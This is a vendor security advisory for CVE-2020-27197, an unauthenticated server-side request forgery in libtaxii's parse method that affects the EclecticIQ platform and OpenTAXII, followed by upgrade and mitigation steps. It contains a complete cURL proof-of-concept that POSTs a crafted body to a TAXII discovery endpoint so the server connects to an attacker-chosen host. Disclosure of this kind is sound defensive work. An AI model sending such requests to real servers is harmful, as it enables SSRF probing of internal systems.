EIQ-2020-0012#

ID

EIQ-2020-0012

CVE

CVE-2020-27197

Description

libtaxii is vulnerable to server-side request forgery (SSRF).

Date

14 Oct 2020

Severity

2 - MEDIUM

CVSSv3 score

5.3 (Snyk score)

Status

✅ 2.9.0

Assessment

libtaxii versions 1.1.117 and earlier are vulnerable to SSRF.

It is possible to exploit the vulnerability by passing a http:// string as an argument of the parse method.

The libtaxii parse method wraps the lxml library; it uses the library etree module to parse data and to store hierarchical structures in the memory.

libtaxii is a dependency of EclecticIQ OpenTAXII, which is therefore also affected by the same vulnerability in versions 0.2.0 and earlier.

  • An attacker could exploit the vulnerability by sending a maliciously crafted TAXII request to a TAXII server.

  • The TAXII server would accept the request, and it would not verify that the expected destination matches the actual one.

  • The TAXII server could then be deceived into connecting to arbitrary IP addresses or domains that the attacker controls.

The vulnerability can be exploited on any platform instance relying on a running TAXII server.

To exploit the vulnerability, an attacker would not need to log in to the platform.

The following example uses cURL to demonstrate the exploit:

curl -i -s -k -X $'POST' \
    -H $'Host: 192.0.2.254' \
    -H $'Connection: close' \
    -H $'Accept-Encoding: gzip, deflate' \
    -H $'Accept: application/xml' \
    -H $'User-Agent: Cabby 0.1.20' \
    -H $'X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1' \
    -H $'X-TAXII-Services: urn:taxii.mitre.org:services:1.1' \
    -H $'X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1' \
    -H $'X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0' \
    -H $'Content-Type: application/xml' \
    -H $'Content-Length: 19' \
    --data-binary $'http://203.0.113.255?ssrf-exploit' \
    --url $'https://192.0.2.255/taxii/discovery'
  • 192.0.2.254 is the IP address of the server hosting a platform instance.

  • 192.0.2.255 is the IP address of the platform instance.

  • /taxii/discovery is the endpoint exposing the TAXII discovery service.

  • https://203.0.113.255?ssrf-exploit is the arbitrary address the platform TAXII server is deceived into connecting to.

See also:

Mitigation

The vulnerability has been addressed and solved in libtaxii version 1.1.118.

From release 2.9.0, the platform and its OpenTAXII server component depend on libtaxii 1.1.118.

To address the vulnerability, we encourage upgrading the platform to release 2.9.0.

For platform releases 2.8.0 and earlier, it is possible to upgrade to libtaxii 1.1.118 within the platform virtual environment.

This dependency upgrade works and is compatible with EclecticIQ Platform releases 2.8.0 and earlier, and with OpenTAXII releases 0.2.0 and earlier.

To mitigate the issue in platform instances release 2.8.0 and earlier:

  • Restrict platform access to only trusted users.

  • Do not allow platform access to untrusted sources.

  • Do not allow external requests to localhost through the network loopback interface.

Affected versions

2.8.0 and earlier.

Notes

For more information, see: